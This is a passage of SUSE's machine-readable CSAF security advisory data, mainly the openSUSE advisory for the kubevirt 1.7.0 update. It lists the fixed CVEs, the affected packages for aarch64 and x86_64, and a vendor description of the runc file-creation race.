"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
OPENSUSE-SU-2026:20281-1
Vulnerability from csaf_opensuse - Published: 2026-02-27 08:51 - Updated: 2026-02-27 08:51Summary
Security update for kubevirt
Notes
Title of the patch
Security update for kubevirt
Description of the patch
This update for kubevirt fixes the following issues:
Update to version 1.7.0 (bsc#1257128).
Security issues fixed:
- CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS
(bsc#1253189).
- CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into
creating empty files/directories on host (bsc#1257422).
- CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction
(bsc#1241772).
- CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to
bypass existing RBAC controls (bsc#1253181).
- CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).
- CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations
(bsc#1253186).
- CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).
- CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users
(bsc#1253748).
Other updates and bugfixes:
- Upstream now uses stateless firmware for CoCo VMs.
Patchnames
openSUSE-Leap-16.0-319
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20281-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:51:11Z",
"generator": {
"date": "2026-02-27T08:51:11Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20281-1",
"initial_release_date": "2026-02-27T08:51:11Z",
"revision_history": [
{
"date": "2026-02-27T08:51:11Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-tests-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-tests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
